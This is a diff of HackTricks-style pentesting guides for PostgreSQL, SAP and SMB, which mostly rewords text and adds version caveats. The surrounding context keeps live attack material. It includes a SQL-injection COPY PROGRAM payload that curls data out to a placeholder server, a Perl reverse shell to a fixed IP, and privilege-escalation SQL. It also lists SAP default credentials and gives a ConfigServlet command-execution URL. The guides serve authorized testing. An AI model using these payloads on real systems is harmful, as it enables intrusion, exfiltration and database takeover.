-    **Note:** If you are unable to retrieve the current data directory path from settings, you can query the major PostgreSQL version through the `SELECT version()` query and try to brute-force the path. Common data directory paths on Unix installations of PostgreSQL are `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`. A common cluster name is `main`.
+    **Note:** If you cannot retrieve the current data-directory setting, query the major version with `SELECT version()` and test platform-specific package layouts. A common Debian/Ubuntu path is `/var/lib/postgresql/MAJOR_VERSION/CLUSTER_NAME/`, often with cluster name `main`.
 
 2.  Obtain a relative path to the filenode, associated with the target table
 
@@ -384,13 +374,13 @@ Required steps:
 
 8.  You should now see updated table values in the PostgreSQL.
 
-You can also become a superadmin by editing the `pg_authid` table. **See** [**the following section**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables).
+You can also become a superuser by editing the `pg_authid` table. See [the corresponding privilege-escalation section](pentesting-postgresql.md#privilege-escalation-by-overwriting-internal-postgresql-tables).
 
 ## RCE
 
 ### **RCE to program**
 
-Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), only **super users** and member of the group **`pg_execute_server_program`** can use copy for RCE (example with exfiltration:
+`COPY ... PROGRAM` has existed since PostgreSQL 9.3. It executes an operating-system command as the database service account and is restricted to superusers or roles granted `pg_execute_server_program`. An SQL-injection exfiltration example is:<sup>[[15]](#references)</sup>
 
 ```sql
 '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
@@ -407,12 +397,12 @@ SELECT * FROM cmd_exec;
 DROP TABLE IF EXISTS cmd_exec;
 
 #Reverse shell
-#Notice that in order to scape a single quote you need to put 2 single quotes
+# To escape a single quote in the SQL literal, double it
 COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
 ```
 
 > [!WARNING]
-> Remember that if you aren't super user but has the **`CREATEROLE`** permissions you can **make yourself member of that group:**
+> This self-grant path applies directly to PostgreSQL 15 and earlier. On PostgreSQL 16 and later, the session also needs `ADMIN OPTION` on `pg_execute_server_program` (or superuser authority).<sup>[[19]](#references)</sup>
 >
 > ```sql
 > GRANT pg_execute_server_program TO username;
@@ -421,7 +411,7 @@ COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::I
 > [**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole)
 
 Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.\
-More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).<sup>[[3]](#references)[[15]](#references)</sup>
+More information about the technique is available in the linked research. Although it was submitted as CVE-2019-9193, the PostgreSQL project clarified that authorized `COPY ... PROGRAM` execution is an intended feature rather than a vulnerability.<sup>[[3]](#references)[[15]](#references)</sup>
 
 #### Bypass keyword filters/WAF to reach COPY PROGRAM
 
@@ -438,28 +428,20 @@ END $$;
 
 This pattern avoids static keyword filtering and still achieves OS command execution via `COPY ... PROGRAM`. It is especially useful when the application echoes SQL errors and allows stacked queries.<sup>[[4]](#references)[[5]](#references)</sup>
 
-### RCE with PostgreSQL Languages
+### RCE with PostgreSQL languages
 
-
-{{#ref}}
-../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md
-{{#endref}}
+See [RCE with PostgreSQL procedural languages](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md).
 
 ### RCE with PostgreSQL extensions
 
-Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**.
-
-
-{{#ref}}
-../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
-{{#endref}}
+After obtaining a binary-safe upload primitive, you can test code execution by loading a compatible PostgreSQL extension. See [RCE with PostgreSQL extensions](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md).
 
 ### PostgreSQL configuration file RCE
 
 > [!TIP]
 > The following RCE vectors are especially useful in constrained SQLi contexts, as all steps can be performed through nested SELECT statements
 
-The **configuration file** of PostgreSQL is **writable** by the **postgres user**, which is the one running the database, so as **superuser**, you can write files in the filesystem, and therefore you can **overwrite this file.**
+These techniques require a PostgreSQL configuration file that the database service account can overwrite. That is common in some source/container layouts, but packaged systems may keep the main file root-owned; database superuser status alone does not bypass operating-system permissions.
 
 ![RCE with PostgreSQL extensions - PostgreSQL configuration file RCE: The configuration file of PostgreSQL is writable by the postgres user , which is the one running the database, so as...](<../images/image (322).png>)
 
@@ -467,11 +449,11 @@ The **configuration file** of PostgreSQL is **writable** by the **postgres user*
 
 More information [about this technique here](https://pulsesecurity.co.nz/articles/postgres-sqli).<sup>[[6]](#references)</sup>
 
-The configuration file have some interesting attributes that can lead to RCE:
+The configuration file has several settings that can lead to command execution when their prerequisites are met:
 
 - `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database
-- `ssl_passphrase_command = ''` If the private file is protected by password (encrypted) postgresql will **execute the command indicated in this attribute**.
-- `ssl_passphrase_command_supports_reload = off` **If** this attribute is **on** the **command** executed if the key is protected by password **will be executed** when `pg_reload_conf()` is **executed**.
+- `ssl_passphrase_command = ''` specifies a command used to obtain the passphrase for an encrypted private key.
+- `ssl_passphrase_command_supports_reload = off` controls whether that command may run during a configuration reload when a passphrase is needed.
 
 Then, an attacker will need to:
 
@@ -601,15 +583,15 @@ The attack steps are:
 8. Reload the server configuration by restarting the server or invoking the `SELECT pg_reload_conf()` query
 9. At the next DB connection, you will receive the reverse shell connection.
 
-## **Postgres Privesc**
+## PostgreSQL privilege escalation
 
-### CREATEROLE Privesc
+### Privilege escalation with CREATEROLE
 
 #### **Grant**
 
-According to the [**docs**](https://www.postgresql.org/docs/13/sql-grant.html): _Roles having **`CREATEROLE`** privilege can **grant or revoke membership in any role** that is **not** a **superuser**._<sup>[[16]](#references)</sup>
+On PostgreSQL 15 and earlier, roles with **`CREATEROLE`** could grant or revoke membership in any non-superuser role. PostgreSQL 16 tightened role administration: changing membership now requires `ADMIN OPTION` on the target role, and altering sensitive attributes requires corresponding authority.<sup>[[16]](#references)[[19]](#references)</sup>
 
-So, if you have **`CREATEROLE`** permission you could grant yourself access to other **roles** (that aren't superuser) that can give you the option to read & write files and execute commands:
+Therefore, on a vulnerable older server—or on a newer server where the account also has the needed grant option—you may be able to grant yourself predefined roles that read/write server files or execute programs:
 
 ```sql
 # Access to execute commands
@@ -622,16 +604,16 @@ GRANT pg_write_server_files TO username;
 
 #### Modify Password
 
-Users with this role can also **change** the **passwords** of other **non-superusers**:
+On PostgreSQL 15 and earlier, `CREATEROLE` can also change passwords of other non-superusers. On PostgreSQL 16 and later, this requires administrative authority over the target role.<sup>[[19]](#references)</sup>
 
 ```sql
 #Change password
 ALTER USER user_name WITH PASSWORD 'new_password';
 ```
 
-#### Privesc to SUPERUSER
+#### Escalation to SUPERUSER
 
-It's pretty common to find that **local users can login in PostgreSQL without providing any password**. Therefore, once you have gathered **permissions to execute code** you can abuse these permissions to gran you **`SUPERUSER`** role:
+If `pg_hba.conf` trusts a local connection for a database superuser, command execution as the PostgreSQL OS account can invoke `psql` through that trusted path and grant your database role **`SUPERUSER`**:
 
 ```sql
 COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
@@ -649,9 +631,9 @@ COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username>
 > host    all             all             ::1/128                 trust
 > ```
 
-### **ALTER TABLE privesc**
+### ALTER TABLE privilege escalation
 
-In [**this writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) is explained how it was possible to **privesc** in Postgres GCP abusing ALTER TABLE privilege that was granted to the user.<sup>[[9]](#references)</sup>
+[This write-up](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) explains how an excessive `ALTER TABLE` privilege granted to a non-superuser PostgreSQL role in Google Cloud SQL could be abused to escalate privileges.<sup>[[9]](#references)</sup>
 
 When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
 
@@ -704,7 +686,7 @@ uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
 
 ### Local Login
 
-Some misconfigured postgresql instances might allow login of any local user, it's possible to local from 127.0.0.1 using the **`dblink` function**:
+Some misconfigured PostgreSQL instances allow privileged local connections that are unavailable remotely. With valid credentials—or an applicable local trust rule—the **`dblink`** extension can make a new loopback connection and execute queries as that role:
 
 ```sql
 \du * # Get Users
@@ -743,7 +725,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
 
 ### **Custom defined function with** SECURITY DEFINER
 
-[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:<sup>[[10]](#references)</sup>
+[This write-up](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql) describes how pentesters escalated privileges inside an IBM-managed PostgreSQL instance after finding a function declared with **`SECURITY DEFINER`**:<sup>[[10]](#references)</sup>
 
 <pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text) 
     RETURNS text 
@@ -766,7 +748,7 @@ AS $BODY$
 
 As [**explained in the docs**](https://www.postgresql.org/docs/current/sql-createfunction.html) a function with **SECURITY DEFINER is executed** with the privileges of the **user that owns it**. Therefore, if the function is **vulnerable to SQL Injection** or is doing some **privileged actions with params controlled by the attacker**, it could be abused to **escalate privileges inside postgres**.<sup>[[17]](#references)</sup>
 
-In the line 4 of the previous code you can see that the function has the **SECURITY DEFINER** flag.
+The declaration above includes the **`SECURITY DEFINER`** flag.
 
 ```sql
 CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
@@ -778,20 +760,15 @@ And then **execute commands**:
 
 <figure><img src="../images/image (649).png" alt=""><figcaption></figcaption></figure>
 
-### Pass Burteforce with PL/pgSQL
+### Password brute force with PL/pgSQL
 
 **PL/pgSQL** is a **fully featured programming language** that offers greater procedural control compared to SQL. It enables the use of **loops** and other **control structures** to enhance program logic. In addition, **SQL statements** and **triggers** have the capability to invoke functions that are created using the **PL/pgSQL language**. This integration allows for a more comprehensive and versatile approach to database programming and automation.\
-**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.**
+In an authorized assessment, server-side loops can test candidate database credentials. See [PL/pgSQL password brute force](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md); constrain attempts to avoid lockouts and resource exhaustion.
 
-
-{{#ref}}
-../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md
-{{#endref}}
-
-### Privesc by Overwriting Internal PostgreSQL Tables
+### Privilege escalation by overwriting internal PostgreSQL tables
 
 > [!TIP]
-> The following privesc vector is especially useful in constrained SQLi contexts, as all steps can be performed through nested SELECT statements
+> The following privilege-escalation vector is especially useful in constrained SQL injection contexts because every step can be performed through nested `SELECT` statements.
 
 If you can **read and write PostgreSQL server files**, you can **become a superuser** by overwriting the PostgreSQL on-disk filenode, associated with the internal `pg_authid` table.
 
@@ -806,7 +783,7 @@ The attack steps are:
 5. Use the [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) to [edit the filenode](https://adeadfed.com/posts/updating-postgresql-data-without-update/#privesc-updating-pg_authid-table); set all `rol*` boolean flags to 1 for full permissions.
 6. Re-upload the edited filenode via the `lo_*` functions, and overwrite the original file on the disk
 7. _(Optionally)_ Clear the in-memory table cache by running an expensive SQL query
-8. You should now have the privileges of a full superadmin.
+8. You should now have full superuser privileges.
 
 ### Prompt-injecting managed migration tooling
 
@@ -858,7 +835,7 @@ FROM pg_catalog.pg_authid;
 
 Low-privileged users can now read `public.ai_models` to obtain SCRAM hashes and role metadata for offline cracking or lateral movement.
 
-### Event-trigger privesc during `postgres_fdw` extension installs
+### Event-trigger privilege escalation during `postgres_fdw` extension installs
 
 Managed Supabase deployments rely on the `supautils` extension to wrap `CREATE EXTENSION` with provider-owned `before-create.sql`/`after-create.sql` scripts executed as true superusers. The `postgres_fdw` after-create script briefly issues `ALTER ROLE postgres SUPERUSER`, runs `ALTER FOREIGN DATA WRAPPER postgres_fdw OWNER TO postgres`, then reverts `postgres` back to `NOSUPERUSER`. Because `ALTER FOREIGN DATA WRAPPER` fires `ddl_command_start`/`ddl_command_end` event triggers while `current_user` is superuser, tenant-created triggers can execute attacker SQL inside that window.<sup>[[11]](#references)</sup>
 
@@ -1024,7 +1001,7 @@ print(pbkdf2_sha512.verify(derived, stored_hash))
 
 Client authentication in PostgreSQL is managed through a configuration file called **pg_hba.conf**. This file contains a series of records, each specifying a connection type, client IP address range (if applicable), database name, user name, and the authentication method to use for matching connections. The first record that matches the connection type, client address, requested database, and user name is used for authentication. There is no fallback or backup if authentication fails. If no record matches, access is denied.
 
-The available password-based authentication methods in pg_hba.conf are **md5**, **crypt**, and **password**. These methods differ in how the password is transmitted: MD5-hashed, crypt-encrypted, or clear-text. It's important to note that the crypt method cannot be used with passwords that have been encrypted in pg_authid.
+Current password-based methods include **`scram-sha-256`**, **`md5`**, and **`password`**. `scram-sha-256` performs SCRAM authentication; an `md5` rule can negotiate SCRAM when the stored verifier is SCRAM, while MD5 password verifiers are deprecated; `password` sends the password in cleartext unless the connection is protected by TLS. Historical `crypt` authentication is no longer supported by current PostgreSQL releases.<sup>[[20]](#references)</sup>
 
 #### Local Linux enumeration
 
@@ -1075,7 +1052,10 @@ What to look for:
 - [13] [pgAdmin fix for CVE-2025-2945](https://github.com/pgadmin-org/pgadmin4/commit/75be0bc22d3d8d7620711835db817bd7c021007c)
 - [14] [NVD: CVE-2025-2945](https://nvd.nist.gov/vuln/detail/CVE-2025-2945)
 - [15] [postgresql.org - feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935)
-- [16] [postgresql.org - 13 - Sql Grant](https://www.postgresql.org/docs/13/sql-grant.html)
-- [17] [postgresql.org - explained in the docs](https://www.postgresql.org/docs/current/sql-createfunction.html)
+- [16] [PostgreSQL 13 documentation - GRANT](https://www.postgresql.org/docs/13/sql-grant.html)
+- [17] [PostgreSQL documentation - CREATE FUNCTION and `SECURITY DEFINER`](https://www.postgresql.org/docs/current/sql-createfunction.html)
+- [18] [PostgreSQL documentation - `postgres` server port and bind failures](https://www.postgresql.org/docs/current/app-postgres.html)
+- [19] [PostgreSQL 16 release notes - restrictions on `CREATEROLE`](https://www.postgresql.org/docs/16/release-16.html)
+- [20] [PostgreSQL documentation - `pg_hba.conf` authentication methods](https://www.postgresql.org/docs/current/auth-pg-hba-conf.html)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/pentesting-sap.md
+++ b/src/network-services-pentesting/pentesting-sap.md
@@ -3,20 +3,19 @@
 {{#include ../banners/hacktricks-training.md}}
 
 
-## Introduction about SAP
+## SAP overview
 
-SAP stands for Systems Applications and Products in Data Processing. SAP, by definition, is also the name of the ERP \(Enterprise Resource Planning\) software as well as the name of the company.  
-SAP system consists of a number of fully integrated modules, which covers virtually every aspect of business management.
+SAP stands for Systems, Applications, and Products in Data Processing. SAP is both the name of the company and its enterprise resource planning (ERP) software.
+SAP systems consist of fully integrated modules that cover virtually every aspect of business management.
 
-Each SAP instance \(or SID\) is composed of three layers: database, application and presentation\), each landscape usually consists of four instances: dev, test, QA and production.  
-Each of the layers can be exploited to some extent, but most effect can be gained by **attacking the database**.
+Each SAP instance (or SID) has three layers: database, application, and presentation. A typical landscape has development, test, quality-assurance, and production systems.
+Each layer exposes attack surface, but compromising the database can have the greatest impact.<sup>[[8]](#references)</sup>
 
-Each SAP instance is divided into clients. Each one has a user SAP\*, the application’s equivalent of “root”.  
-Upon initial creation, this user SAP\* gets a default password: “060719992” \(more default password below\).  
-You’d be surprised if you knew how often these **passwords aren’t changed in test or dev environments**!
+Each SAP instance is divided into clients. Each client has a `SAP*` user, which is the application's equivalent of a superuser.
+On older installations, this user initially received the default password `06071992`; additional default credentials are listed below. Always test default credentials only within the authorized scope.<sup>[[3]](#references)</sup>
 
-Try to get access to the shell of any server using username &lt;SID&gt;adm.  
-Bruteforcing can help, whoever there can be Account Lockout mechanism.<sup>[[8]](#references)</sup>
+Where permitted, test access to the server shell with the username `<SID>adm`.
+Password guessing may help, but account-lockout controls may be enabled.<sup>[[8]](#references)</sup>
 
 ## Discovery
 
@@ -39,7 +38,7 @@ https://www.shodan.io/search?query=SAP+J2EE+Engine
 
 ![SAP Logon screen](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/sap%20logon.jpeg)
 
-- Use nmap to check for open ports and known services \(sap routers, webdnypro, web services, web servers, etc.\)
+- Use Nmap to check for open ports and known services (SAProuter, Web Dynpro, web services, web servers, etc.).
 - Map instance numbers from open ports before logging in. Useful patterns during enumeration: `32<NR>` \(dispatcher\), `33<NR>` \(gateway\), `5<NR>13` / `5<NR>14` \(sapstartsrv / sapcontrol\), and SAP Host Agent on `1128`/`1129` \(HTTP/HTTPS SOAP\). This quickly tells you which instance number \(`NR`\) to reuse in SAP GUI, RFC, or Metasploit modules.
 - If you find a reachable SAProuter, keep the deep-dive in the dedicated page and use it for pivoting instead of duplicating tests here:
 
@@ -77,7 +76,7 @@ msf auxiliary(sap_service_discovery) > run
 Here is the command to connect to SAP GUI  
 `sapgui <sap server hostname> <system number>`
 
-- Check for default credentials \(In Bugcrowd’s Vulnerability Rating Taxonomy, this is considered as P1 -&gt; Server Security Misconfiguration \| Using Default Credentials \| Production Server\):<sup>[[3]](#references)</sup>
+- Check for default credentials (Bugcrowd's Vulnerability Rating Taxonomy classifies production-server default credentials as P1 → Server Security Misconfiguration | Using Default Credentials | Production Server):<sup>[[3]](#references)</sup>
 
 ```text
 # SAP* - High privileges - Hardcoded kernel user
@@ -155,7 +154,7 @@ BWDEVELOPER:Down1oad:001
 - Check out Jason Haddix’s [“The Bug Hunters Methodology”](https://github.com/jhaddix/tbhm) for testing web vulnerabilities.
 - Auth Bypass via verb Tampering? Maybe :\)
 - Open `http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#` then hit the “Choose” Button and then in the opened window press “Search”. You should be able to see a list of SAP users \(Vulnerability Reference: [ERPSCAN-16-010](https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/) \)<sup>[[5]](#references)</sup>
-- Are the credentials submitted over HTTP? If it is then it is considered as P3 based on Bugcrowd’s [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy): Broken Authentication and Session Management \| Weak Login Function Over HTTP. Hint: Check out [http://SAP:50000/startPage](http://sap:50000/startPage) too or the logon portals :\)
+- Are credentials submitted over HTTP? If so, Bugcrowd's [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) classifies this as P3: Broken Authentication and Session Management | Weak Login Function Over HTTP. Also check [http://SAP:50000/startPage](http://sap:50000/startPage) and the logon portals.
 
 ![SAP Start Page](https://raw.githubusercontent.com/shipcod3/mySapAdventures/master/screengrabs/startPage.jpeg)
 
@@ -195,7 +194,7 @@ BWDEVELOPER:Down1oad:001
 
 ## Configuration Parameters
 
-If you have correct login details during the pentest or you have managed to login to SAP GUI using basic credentials, you are able to check the parameter values. Many basic and custom configuration parameter values ​​are considered vulnerabilities.<sup>[[6]](#references)</sup>
+If you have valid credentials or have logged in to SAP GUI during the assessment, you can inspect parameter values. Unsafe values in standard or custom parameters may constitute security findings.<sup>[[6]](#references)</sup>
 
 You can check parameter values ​​both manually and automatically, using scripts (e.g. [SAP Parameter Validator](https://github.com/damianStrojek/SAPPV)).
 
@@ -205,7 +204,7 @@ By navigating to Transaction Code `RSPFPAR`, you can query different parameters 
 
 The table below contains the defined parameters and the conditions for which they are distinguished.
 
-For example, if <i>gw/reg_no_conn_info</i> is set to less than 255 (`<255`), then it should be considered as threat. Similarly, if <i>icm/security_log</i> is equal to two (`2`), it will also be a possible threat.
+For example, treat `gw/reg_no_conn_info` below 255 (`<255`) as a potential threat. Likewise, an `icm/security_log` value of two (`2`) may indicate an unsafe configuration.
 
 | Parameter                                     | Constraint | Description                                                                   |
 | --------------------------------------------- | ---------- | ----------------------------------------------------------------------------- |
@@ -240,7 +239,7 @@ For example, if <i>gw/reg_no_conn_info</i> is set to less than 255 (`<255`), the
 
 ### Script for Parameter Checking
 
-Due to the number of parameters, it is also possible to export all of them to an .XML file and use the script [SAPPV (SAP Parameter Validator)](https://github.com/damianStrojek/SAPPV), which will check all the above-mentioned parameters and print them values ​​with appropriate distinction.
+Because there are many parameters, you can export them to an XML file and use [SAPPV (SAP Parameter Validator)](https://github.com/damianStrojek/SAPPV) to check the values and highlight relevant findings.
 
 ```
 ./SAPPV.sh EXPORT.XML
@@ -349,7 +348,11 @@ Matching Modules
 - Test RFC callback behaviour when you control one side of a trust relationship. Callback abuse matters because a destination can allow a benign function call but still execute attacker-controlled callback functions on the caller side if callback restrictions are weak or disabled. In practice, validate whether the destination has an active allowlist and whether `rfc/callback_security_method` is enforcing it.<sup>[[11]](#references)</sup>
 - If you gain access to one SAP system, try a trusted RFC jump from `SM59`: using the same admin identifier in the already-compromised source system can let you open the trusting target directly with the remote user's privileges. This is especially relevant in landscapes where SolMan, BW, PI/PO, or transport systems maintain long-lived trusted links.
 
-- Try to use some known exploits \(check out Exploit-DB\) or attacks like the old but goodie “SAP ConfigServlet Remote Code Execution” in the SAP Portal:
+### Legacy SAP AS Java UME password hashes
+
+With authorized database access to a legacy SAP AS Java system, inspect the User Management Engine (UME) storage for password records. The cited research queried `UME_STRINGS` by its `PID` and `VAL` fields and documented values carrying metadata such as `{SHA-512, 10000, 24}`. Treat the schema and hash format as version-specific, and perform any offline password audit only within the approved scope.<sup>[[12]](#references)</sup>
+
+- Test applicable known exploits (check Exploit-DB), including the old but noteworthy “SAP ConfigServlet Remote Code Execution” attack against SAP Portal:
 
 ```text
 http://example.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=uname -a
@@ -383,7 +386,7 @@ bizploit> start
 
 ## Other Useful Tools for Testing
 
-- [PowerSAP](https://github.com/airbus-seclab/powersap) - Powershell tool to assess sap security
+- [PowerSAP](https://github.com/airbus-seclab/powersap) - PowerShell tool for assessing SAP security
 - [Burp Suite](https://portswigger.net/burp) - a must have for directory fuzzing and web security assessments
 - [pysap](https://github.com/OWASP/pysap) - actively maintained Python library to craft SAP NI, Router, Diag, RFC, SNC, HDB and related packets; useful for custom protocol work and SAProuter pivoting
 - [SAPPV](https://github.com/damianStrojek/SAPPV) - lightweight validator for exported `RSPFPAR` XML parameter dumps

--- a/src/network-services-pentesting/pentesting-smb/README.md
+++ b/src/network-services-pentesting/pentesting-smb/README.md
@@ -2,9 +2,9 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## **Port 139**
+## Port 139
 
-The _**Network Basic Input Output System**_** (NetBIOS)** is a software protocol designed to enable applications, PCs, and Desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. The identification and location of software applications operating on a NetBIOS network are achieved through their NetBIOS names, which can be up to 16 characters in length and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) utilizing **TCP Port 139**.
+NetBIOS provides naming, datagram, and session services to applications. NetBIOS names are 16-byte identifiers (commonly described as 15 visible characters plus a service suffix). SMB can use the NetBIOS Session Service over TCP port **139**, although modern SMB commonly uses direct TCP instead.<sup>[[9]](#references)</sup>
 
 ```
 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
@@ -12,9 +12,9 @@ The _**Network Basic Input Output System**_** (NetBIOS)** is a software protocol
 
 ## Port 445
 
-Technically, Port 139 is referred to as ‘NBT over IP’, whereas Port 445 is identified as ‘SMB over IP’. The acronym **SMB** stands for ‘**Server Message Blocks**’, which is also modernly known as the **Common Internet File System (CIFS)**. As an application-layer network protocol, SMB/CIFS is primarily utilized to enable shared access to files, printers, serial ports, and facilitate various forms of communication between nodes on a network.
+Port 139 carries the NetBIOS Session Service, while TCP port 445 (`microsoft-ds`) carries SMB directly. **SMB** stands for **Server Message Block**. **CIFS** refers to the older SMB1 dialect and should not be used as a synonym for modern SMB2/SMB3. SMB provides shared access to resources such as files, printers, and named pipes.<sup>[[9]](#references)[[10]](#references)</sup>
 
-For example, in the context of Windows, it is highlighted that SMB can operate directly over TCP/IP, eliminating the necessity for NetBIOS over TCP/IP, through the utilization of port 445. Conversely, on different systems, the employment of port 139 is observed, indicating that SMB is being executed in conjunction with NetBIOS over TCP/IP.
+When SMB is observed on port 445 it is using direct TCP; on port 139 it is transported through NetBIOS over TCP. SMB2 also supports other transports in newer deployments, including RDMA and QUIC for applicable dialects.<sup>[[9]](#references)</sup>
 
 ```
 445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
@@ -22,13 +22,13 @@ For example, in the context of Windows, it is highlighted that SMB can operate d
 
 ### SMB
 
-The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed for regulating **access to files**, directories, and other network resources like printers and routers. Primarily utilized within the **Windows** operating system series, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the **Samba** project offers a free software solution, enabling SMB's implementation on **Linux** and Unix systems, thereby facilitating cross-platform communication through SMB.
+The **Server Message Block (SMB)** protocol uses a client-server model to provide access to files, directories, printers, named pipes, and related network resources. Windows includes SMB client and server components, and the **Samba** project implements SMB for Linux and other Unix-like systems. Compatibility depends on the dialects and security features enabled; current systems may deliberately disable SMB1 and other legacy behavior.<sup>[[10]](#references)</sup>
 
-Shares, representing **arbitrary parts of the local file system**, can be provided by an SMB server, making the hierarchy visible to a client partly **independent** from the server's actual structure. The **Access Control Lists (ACLs)**, which define **access rights**, allow for **fine-grained control** over user permissions, including attributes like **`execute`**, **`read`**, and **`full access`**. These permissions can be assigned to individual users or groups, based on the shares, and are distinct from the local permissions set on the server.
+An SMB server exports resources as named shares, so the hierarchy visible to a client can differ from the underlying filesystem. Share permissions and filesystem ACLs are separate layers, but a client's **effective** access is constrained by both. Always test the actual operations permitted rather than infer access from a share-listing label alone.
 
 ### IPC$ Share
 
-Access to the IPC$ share can be obtained through an anonymous null session, allowing for interaction with services exposed via named pipes. The utility `enum4linux` is useful for this purpose. Utilized properly, it enables the acquisition of:
+`IPC$` exposes inter-process communication resources such as named pipes. Some servers permit anonymous or guest access through a null session, but current Windows/Samba policies frequently restrict it. When permitted, tools such as `enum4linux` can query:
 
 - Information on the operating system
 - Details on the parent domain
@@ -36,7 +36,7 @@ Access to the IPC$ share can be obtained through an anonymous null session, allo
 - Information on available SMB shares
 - The effective system security policy
 
-This functionality is critical for network administrators and security professionals to assess the security posture of SMB (Server Message Block) services on a network. `enum4linux` provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential vulnerabilities and ensuring that the SMB services are properly secured.
+The exact results depend on anonymous-access policy and the privileges of supplied credentials.
 
 ```bash
 enum4linux -a target_ip
@@ -46,12 +46,7 @@ The above command is an example of how `enum4linux` might be used to perform a f
 
 ## What is NTLM
 
-If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about **NTLM** where is explained **how this protocol works and how you can take advantage of it:**
-
-
-{{#ref}}
-../../windows-hardening/ntlm/
-{{#endref}}
+For protocol details, attack prerequisites, and defenses, see [NTLM](../../windows-hardening/ntlm/).
 
 ## **Server Enumeration**
 
@@ -63,7 +58,7 @@ nbtscan -r 192.168.0.1/24
 
 ### SMB server version
 
-To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can:
+To evaluate version-specific exposures, determine the server implementation and negotiated SMB dialect. If other tools do not reveal them, you can:
 
 - Use the **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
 - Or this script:
@@ -108,8 +103,6 @@ searchsploit microsoft smb
 
 - [**SMB Brute Force**](../../generic-hacking/brute-force.md#smb)
 
-### SMB Environment Information
-
 ### Obtain Information
 
 ```bash
@@ -136,12 +129,12 @@ rpcclient -U "username%passwd" <IP> #With creds
 
 ### Enumerate Users, Groups & Logged On Users
 
-This info should already being gathered from enum4linux and enum4linux-ng
+This information may already have been gathered by `enum4linux` or `enum4linux-ng`.
 
 ```bash
 crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
 crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
-crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
+crackmapexec smb 10.10.10.10 --loggedon-users [-u <username> -p <password>]
 
 ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "
 
@@ -172,12 +165,9 @@ set rhosts hostname.local
 run
 ```
 
-### **Enumerating LSARPC and SAMR rpcclient**
+### Enumerating LSARPC and SAMR with `rpcclient`
 
-
-{{#ref}}
-rpcclient-enumeration.md
-{{#endref}}
+See the dedicated [`rpcclient` enumeration guide](rpcclient-enumeration.md).
 
 ### GUI connection from linux
 
